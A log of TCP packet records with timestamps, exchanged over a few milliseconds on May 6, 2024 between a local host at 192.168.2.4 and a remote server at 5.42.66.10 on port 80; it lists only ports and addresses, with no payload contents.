May 6, 2024 07:53:04.006635904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006638050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006652117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006664991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006669044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006676912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006681919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006689072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006702900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006717920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006746054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006759882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006761074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006772041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006783962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006797075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.006802082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006823063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006840944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.006967068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007015944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007065058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007112026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007258892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007287979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007302046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007335901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007355928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007364035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007380009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007395029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007436991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007466078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007536888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007549047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007580996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007590055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007595062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007606030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007607937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007618904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007627964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007656097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007703066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007715940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007726908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007739067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007749081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007755041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007772923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007793903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.007800102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007812977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.007854939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008069038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008119106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008126020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008132935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008158922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008182049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008342028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008353949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008366108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008379936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008383989 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008393049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008399963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008405924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008414030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008418083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008430004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008434057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008443117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008454084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008460999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008470058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008477926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008482933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008496046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008502960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008510113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008533001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008550882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008573055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008586884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008598089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008610010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008620977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008622885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008634090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008641958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008657932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008662939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008677006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008687973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008699894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008701086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008711100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008713007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008725882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008733988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008738041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008754969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008785009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008788109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008800030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008811951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008825064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008836031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008836985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008846998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008858919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008861065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008872032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008882999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008882999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008893967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008894920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008908033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008919954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008929014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008934021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.008960962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008975029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.008999109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009011030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009023905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009036064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009038925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009048939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009059906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009063959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009074926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009088039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009097099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009099960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009110928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009119034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009123087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009135962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009138107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009147882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009155035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009160995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009174109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009181976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009207964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009218931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009222984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009233952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009244919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009258032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009268045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009270906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009290934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009296894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009303093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009310961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009316921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009331942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009337902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009344101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009357929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009360075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009370089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009383917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009385109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009396076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009403944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009407997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009417057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009422064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009438038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009445906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009449959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009475946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009490013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009502888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009515047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009526968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009537935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009546041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009551048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009565115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009565115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009577990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009588957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009593964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009602070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009605885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009613991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009625912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009632111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009640932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009653091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009664059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009677887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009699106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009716988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009730101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009742975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009757042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009764910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009768009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009771109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009780884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009793997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009802103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009805918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009835958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009841919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009851933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009864092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009876013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009888887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009891033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009901047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009913921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009923935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009926081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009938002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009951115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.009952068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009962082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009991884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.009994030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010008097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010019064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010030985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010034084 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010042906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010065079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010092020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010111094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010124922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010135889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010149956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010162115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010162115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010174036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010180950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010199070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010207891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010211945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010222912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010230064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010234118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010247946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010257959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010261059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010272980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010283947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010284901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010298014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010304928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010310888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010320902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010323048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010346889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010354996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010373116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010380983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010394096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010397911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010406017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010418892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010418892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010430098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010438919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010442972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010456085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010457039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010468006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010479927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010488033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010492086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010504961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010509968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010516882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010524035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010529995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010540962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010555029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010580063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010585070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010598898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010610104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010621071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010629892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010634899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010648012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010648012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010658979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010668993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010673046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010684967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010691881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010696888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010709047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010731936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010746956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010763884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010776997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010787010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010799885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010801077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010812044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010824919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010838032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010838985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010850906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010863066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010880947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010894060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010901928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010907888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010919094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010931969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010932922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010945082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010955095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010957003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010967016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010977983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.010989904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.010992050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011004925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011008978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011018038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011025906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011045933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011053085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011065960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011076927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011077881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011106968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011132002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011132002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011145115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011157036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011169910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011182070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011184931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011193037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011205912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011210918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.011218071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.011229992 CEST	49741	80	192.168.2.4	5.42.66.10
